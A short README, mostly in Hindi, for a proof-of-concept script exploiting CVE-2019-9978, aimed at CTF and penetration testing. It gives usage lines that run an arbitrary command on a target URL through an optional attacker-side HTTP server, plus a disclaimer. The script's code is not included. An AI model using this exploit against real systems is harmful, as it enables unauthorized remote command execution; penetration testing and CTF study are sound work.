
cve-2019-9978 PoC
यह एक स्क्रिप्ट है जो CVE-2019-9978 भेद्यता का सीधे तरीके से शोषण करने की अनुमति देती है, जिसे कैप्चर द फ्लैग (CTF) चुनौतियों या पेनिट्रेशन परीक्षण के लिए प्रूफ ऑफ कॉन्सेप्ट के रूप में उपयोग करने का इरादा है।
pip install requests के साथ इंस्टॉल करें) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
यह कोड केवल शैक्षिक और परीक्षण उद्देश्यों के लिए है। उचित प्राधिकरण के बिना सिस्टम पर अनधिकृत उपयोग अवैध और अनैतिक है। इसका जिम्मेदारी से उपयोग करें।